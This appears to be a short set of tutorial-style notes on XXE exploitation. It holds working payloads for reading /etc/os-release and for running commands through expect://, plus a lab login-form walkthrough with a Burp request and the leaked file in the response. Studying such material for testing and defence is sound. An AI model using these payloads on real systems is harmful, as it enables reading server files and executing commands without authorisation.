XXE Exploitation
PAYLOADS
- Read Files
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/os-release" >]>
- RCE
- We can use
expect://. (This Module is not guaranteed. It has to beManuallyInstalled)
- We can use
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
XXE Exploitation
Vulnerable Application Scenario
Website Login-Form with NAME - USER - TEL - EMAIL - PASSWORD
- BurpSuite Request
- Our Data is being put into XML Format, and is being posted to process.php.
- Testing with the Request's we found out that it returns the Field:
email(If One Field doesn't work we should Keep Testing to Find a Vulnerable One) - Vulnerable Field:
email. We attach&xxe;to that Field.
- Testing with the Request's we found out that it returns the Field:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/os-release" >]>
<root>
<name>user</name>
<tel>3380</tel>
<email>
&xxe;
</email>
<password>
password
</password>
</root>
- BurpSuite Response
NAME="Ubuntu"
VERSION="18.04.4 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.4 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic